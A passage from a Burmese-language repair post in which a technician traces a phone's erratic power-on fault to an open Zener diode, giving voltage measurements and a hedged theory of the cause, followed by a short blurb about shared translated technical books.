တွေများ ယိုစိမ့်မှု (ရှော့ဖြစ်တဲ့အဆင့် မရောက်သေး) ဖြစ်နေသလား
သတ်မှတ်ဗို့ တည်ငြိမ်အောင် ထိန်းပေးတဲ့ ဇီနာဒိုင်အုတ် (Zener Diode) ပွင့်နေသလား
(ဇီနာဒိုင်အုတ် ရှော့ဖြစ်ရင်တော့ လုံးဝ ရှော့ကျပြီး ပါဝါဆပ်ပလိုင်းက အော် နေပါလိမ့်မည်)
ဖြစ်နိုင်ခြေတွေ စဉ်းစားကြည့်ပါတယ် ...
..............................................................................................................
ဘက်ထရီငုတ်အရင်းနားက စပြီး ဒိုင်အုတ် ဇီနာဒိုင်အုတ် ရီစစ္စတာ ကွန်ဒင်ဆာ များကို
တလုံးချင်း ဖြုတ်တိုင်းကြည့်ပါတယ် ...
ပုံထဲမှာ ပြထားတဲ့ ဇီနာဒိုင်အုတ်တလုံးကလွဲရင် အားလုံး ကောင်းနေပါတယ်
ဇီနာဒိုင်အုတ်က ပွင့်(open) ဖြစ်နေပါတယ် ဇီနာဒိုင်အုတ်ကို ပုံစံတူ ပြန်ရှာတတ်ပြီး
ကျန်တာအားလုံးကိုလဲ ပြန်တတ် စမ်းကြည့်ပါတယ်
ပါဝါဆပ်ပလိုင်းချိတ်ပြီး power , vol up နဲ့ vol down လမ်းကြောင်းတွေမှာ
ဗို့တွေ တိုင်းကြည့်လိုက်တော့
power = 3.58V , vol up = 2.7V နဲ့ vol down = 3.27 ဖြစ်သွားပါတယ်
ခဏစောင့်ပြီး ပြန်တိုင်းတော့လဲ အဲဒီဗို့ ဝန်းကျင်လောက်ပါပဲ
ပါဝါနှိုးလိုက်တယ် ဗို့တွေ တိုင်းကြည့်တော့
power = 3.58V , vol up = 1.7V နဲ့ vol down = 1.7V ငြိမ်နေပါတယ်
ပါဝါဆပ်ပလိုင်းမှာလဲ ပုံမှန် Amp အတိုင်းတက်လာပြီး 0.6A အထိ တက်လာပါတယ်
ပစ္စည်းစုံ ပြန်တတ်ပြီး နှိုးစမ်းလိုက်တော့ ပုံမှန်အတိုင်းပဲ ပွင့်လာပါတော့တယ် ...
power , vol up , vol down ခလုတ်အားလုံး ပုံမှန် အတိုင်းပဲ အလုပ်လုပ်ပါတယ်
ဘက်ထရီကို ဖြုတ်လိုက် နှိုးလိုက် ပြန်ဖြုတ်လိုက် နှိုးလိုက် အကြိမ်ကြိမ်စမ်းကြည့်တယ်
ပုံမှန်အတိုင်းပဲ ပွင့်လာပါတယ် ... လုံးဝ ပြန်မဖေါက်တော့ပါဘူး .....
ပို သေချာအောင်လို့ flash tools firmware ပြန်တင်တော့ တင်လို့ ရသွားပါတယ် ...
...........................................................................................................
အဲဒီမှာ ဖြစ်နိုင်ခြေတခုကို တွေးမိတယ် ... ကျွန်တော့်အတွေးပါ
ဟုတ်ချင်မှလဲ ဟုတ်မှာပါ
အီလက်ထရွန်းနစ်ပစ္စည်းတွေဟာ ပါဝါစနှိုးလိုက်တဲ့အချိန်မှာ ဝန် (load) ဆွဲတတ်ပါတယ်
(ဥပမာ CRT TV တွေဆိုရင် ပိုသိသာပါတယ် မီးအားတချက် ဆောင့်ဆွဲတတ်ပါတယ်)
အဲဒီအချိန်မှာ Amp မတောင့်ရင် ဆက်မနိုးပဲ ပြုတ်ကျတတ်ပါတယ်
ဖုန်းထဲက ဗို့အားပေးလိုင်းမှာလဲ ဝန် စဆွဲတဲ့အချိန်မှာ တောင့်ခံနိုင်အောင်
ဇီနာဒိုင်အုတ်နဲ့ ထိန်းထားတယ် (ကျွန်တော် ထင်တာပါ)
အဲဒီ ဇီနာဒိုင်အုတ် ပွင့်နေပြီး အလုပ်မလုပ်နိုင်တော့ ဗို့အား မငြိမ်နိုင်တော့ပါဘူး
အဲဒါကြောင့် Key လမ်းကြောင်းတွေမှာ ဗို့မမှန်တော့ အလုပ်လုပ်ပုံ မမှန်ပဲ
ပွင့်ချင်သလို ပွင့်နေတယ်လို့ တွေးမိတာပါ .....
.............................................................................................................
Error တခုဖြစ်လာရင် Power IC , eMMC ဆိုပြီး အကြီးကြီးတွေ
သိပ်တွေးတတ်ကြတာကို တွေ့ရတတ်လို့ပါ
အားလုံးကို ဒီအတိုင်းဖြေရှင်းရင် ရနိုင်မယ်လို့ မပြောလိုပါဘူး
အခြေခံလေးတွေက စပြီး စဉ်းစားကြည့်စေချင်လို့ပါဗျ
ဘယ်သူ့ကိုမှ မရည်ရွယ်ပါဘူး ............................
ဒီ solution အတွက် သဲလွန်စ ပေးခဲ့တဲ့ ဦးမောင်နိုင်ရဲ့ အဖွဲ့ထဲက
ကိုဂျလုံးဘလုံး နဲ့ ကိုညာဏ်ဝင်းထွန်းကိုလဲ ကျေးဇူးတင်ပါတယ်
တချို့ အကြောင်းအရာလေးတွေက အများသိအောင် ပြောဖို့ မသင့်ပေမယ့်
သင်္ကြန်ရေစိုဖုန်းတွေနဲ့ တိုင်ပတ်နေကြမယ့် အတွေ့အကြုံနဲသေးတဲ့
ညီငယ်များကို ရည်ရွယ်ပြီး ပြောပြခြင်းပါ စာအရှည်ကြီး ဖတ်ရလို့ ဆောရီးပါဗျ
မှားတာ လိုအပ်တာ ရှိရင်လဲ ဖြည့်စွက် ထောက်ပြကြပါဦးခင်ဗျာ ...

စာအုပ်များ

မြန်မာဘာသာ ဖြင့် ဘာသာပြန်ထားသော နည်းပညာပိုင်းဆိုင်ရာ စာအုပ်များကို မိမိစုဆောင်းထားသမျှကို ပြန်လည် မျှဝေသွားပါမည်